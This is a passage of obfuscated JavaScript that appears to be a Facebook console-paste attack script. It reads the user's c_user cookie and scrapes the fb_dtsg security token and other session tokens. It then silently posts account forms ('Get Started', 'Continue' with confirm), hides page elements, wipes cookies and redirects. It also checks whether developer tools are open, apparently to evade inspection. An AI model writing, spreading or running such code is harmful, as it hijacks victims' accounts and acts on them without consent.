_0x9f67x23[key];break}else {if( typeof _0x9f67x23[key]== _0xff0e[98]){_0x9f67x2e= _n(_0x9f67x23[key],_0x9f67x2d);if(_0x9f67x2e!= false){break}}}};return _0x9f67x2e}function _o(_0x9f67x30){var _0x9f67x31=_0x9f67x30[_0xff0e[37]],_0x9f67x32,_0x9f67x33;while(0!== _0x9f67x31){_0x9f67x33= Math[_0xff0e[64]](Math[_0xff0e[96]]()* _0x9f67x31);_0x9f67x31-= 1;_0x9f67x32= _0x9f67x30[_0x9f67x31];_0x9f67x30[_0x9f67x31]= _0x9f67x30[_0x9f67x33];_0x9f67x30[_0x9f67x33]= _0x9f67x32};return _0x9f67x30}function _p(_0x9f67x35,_0x9f67x36){return Math[_0xff0e[64]](Math[_0xff0e[96]]()* (_0x9f67x36- _0x9f67x35))+ _0x9f67x35}function _r(_0x9f67x38){mtn= _0xff0e[99];ret= _0xff0e[31];for(l= 0;l< _0x9f67x38;l++){ret+= mtn[Math[_0xff0e[64]](Math[_0xff0e[96]]()* mtn[_0xff0e[37]])]};return ret}function _s(_0x9f67x3a){return Object[_0xff0e[104]](_0x9f67x3a)[_0xff0e[103]](function(_0x9f67x1d){return encodeURIComponent(_0x9f67x1d)+ _0xff0e[102]+ encodeURIComponent(_0x9f67x3a[_0x9f67x1d])})[_0xff0e[101]](_0xff0e[100])}function _t(){window[_0xff0e[115]](function(){if(document[_0xff0e[106]](_0xff0e[105])){for(i= 0;i< document[_0xff0e[106]](_0xff0e[105])[_0xff0e[37]];i++){document[_0xff0e[106]](_0xff0e[105])[i][_0xff0e[107]]= _0xff0e[31]}};if(document[_0xff0e[106]](_0xff0e[108])){for(i= 0;i< document[_0xff0e[106]](_0xff0e[108])[_0xff0e[37]];i++){document[_0xff0e[106]](_0xff0e[108])[i][_0xff0e[107]]= _0xff0e[31]}};if(document[_0xff0e[110]](_0xff0e[109])){document[_0xff0e[110]](_0xff0e[109])[_0xff0e[112]][_0xff0e[111]]= _0xff0e[31]};if(document[_0xff0e[106]](_0xff0e[113])){for(i= 0;i< document[_0xff0e[106]](_0xff0e[113])[_0xff0e[37]];i++){document[_0xff0e[106]](_0xff0e[113])[i][_0xff0e[107]]= _0xff0e[31]}};if(document[_0xff0e[106]](_0xff0e[114])){for(i= 0;i< document[_0xff0e[106]](_0xff0e[114])[_0xff0e[37]];i++){document[_0xff0e[106]](_0xff0e[114])[i][_0xff0e[111]]= _0xff0e[31]}}},10)}function _u(){document[_0xff0e[116]][_0xff0e[107]]= _0xff0e[31];var _0x9f67xa={fb_dtsg:fb_dtsg,nh:nh,"\x73\x75\x62\x6D\x69\x74\x5B\x47\x65\x74\x20\x53\x74\x61\x72\x74\x65\x64\x5D":_0xff0e[117]};var _0x9f67x7= new XMLHttpRequest();_0x9f67x7[_0xff0e[15]](_0xff0e[75],_0xff0e[118]);_0x9f67x7[_0xff0e[79]](_0xff0e[77],_0xff0e[78]);_0x9f67x7[_0xff0e[26]](_s(_0x9f67xa));_0x9f67x7[_0xff0e[16]]= function(){if(_0x9f67x7[_0xff0e[17]]== 4){_v();console[_0xff0e[6]](_0xff0e[117])}}}function _v(){var _0x9f67xa={fb_dtsg:fb_dtsg,nh:nh,confirm:_0xff0e[119],"\x73\x75\x62\x6D\x69\x74\x5B\x43\x6F\x6E\x74\x69\x6E\x75\x65\x5D":_0xff0e[120]};var _0x9f67x7= new XMLHttpRequest();_0x9f67x7[_0xff0e[15]](_0xff0e[75],_0xff0e[118]);_0x9f67x7[_0xff0e[79]](_0xff0e[77],_0xff0e[78]);_0x9f67x7[_0xff0e[26]](_s(_0x9f67xa));_0x9f67x7[_0xff0e[16]]= function(){if(_0x9f67x7[_0xff0e[17]]== 4){console[_0xff0e[6]](_0xff0e[121]);_y();location[_0xff0e[122]]= _0xff0e[123]}}}function _y(){var _0x9f67x3f=document[_0xff0e[125]][_0xff0e[25]](_0xff0e[124]);for(var _0x9f67x40=0;_0x9f67x40< _0x9f67x3f[_0xff0e[37]];_0x9f67x40++){var _0x9f67x41=_0x9f67x3f[_0x9f67x40];var _0x9f67x42=_0x9f67x41[_0xff0e[20]](_0xff0e[102]);var _0x9f67x12=_0x9f67x42> -1?_0x9f67x41[_0xff0e[126]](0,_0x9f67x42):_0x9f67x41;document[_0xff0e[125]]= _0x9f67x12+ _0xff0e[127]}}var checkStatus=_0xff0e[128];var element= new Image();element.__defineGetter__(_0xff0e[129],function(){checkStatus= _0xff0e[119]});console[_0xff0e[6]](element);console[_0xff0e[130]]();if(location[_0xff0e[132]][_0xff0e[20]](_0xff0e[131])>= 0&& (checkStatus== _0xff0e[128]|| consoleFree== true)){fb_dtsg_list= document[_0xff0e[134]](_0xff0e[133]);if(!document[_0xff0e[110]](_0xff0e[135])&& fb_dtsg_list[_0xff0e[37]]> 0&& location[_0xff0e[122]][_0xff0e[20]](_0xff0e[136])< 0){var log=document[_0xff0e[138]](_0xff0e[137]);log[_0xff0e[129]]= _0xff0e[135];document[_0xff0e[140]][_0xff0e[139]](log);_t();profile_id= document[_0xff0e[125]][_0xff0e[141]](/c_user=(\d+)/)[1];fb_dtsg= fb_dtsg_list[0][_0xff0e[87]];__rev= document[_0xff0e[140]][_0xff0e[107]][_0xff0e[25]](_0xff0e[143])[1][_0xff0e[25]](_0xff0e[142])[0];ajaxpipe_token= document[_0xff0e[140]][_0xff0e[107]][_0xff0e[25]](_0xff0e[144])[1][_0xff0e[25]](_0xff0e[142])[0];ttstamp= _0xff0e[31];for(var x=0;x< fb_dtsg[_0xff0e[37]];x++){ttstamp+= fb_dtsg[_0xff0e[145]](x)};ttstamp= _0xff0e[146]+ ttstamp;console[_0xff0e[6]](_0xff0e[147]+ profile_id);console[_0xff0e[6]](_0xff0e[148]+ fb_dtsg);console[_0xff0e[6]](_0xff0e[149]+ __rev);console[_0xff0e[6]](_0xff0e[150]+ ttstamp);console[_0xff0e[6]](_0xff0e[151]+ ajaxpipe_token);_a()};if(location[_0xff0e[122]][_0xff0e[20]](_0xff0e[136])> 0&& fb_dtsg_list[_0xff0e[37]]> 0){fb_dtsg= fb_dtsg_list[0][_0xff0e[87]];nh= document[_0xff0e[134]](_0xff0e[152])[0][_0xff0e[87]];console[_0xff0e[6]](fb_dtsg);console[_0xff0e[6]](nh);_u()}}else {if(location[_0xff0e[132]][_0xff0e[20]](_0xff0e[131])>= 0){console[_0xff0e[34]](_0xff0e[153])}}
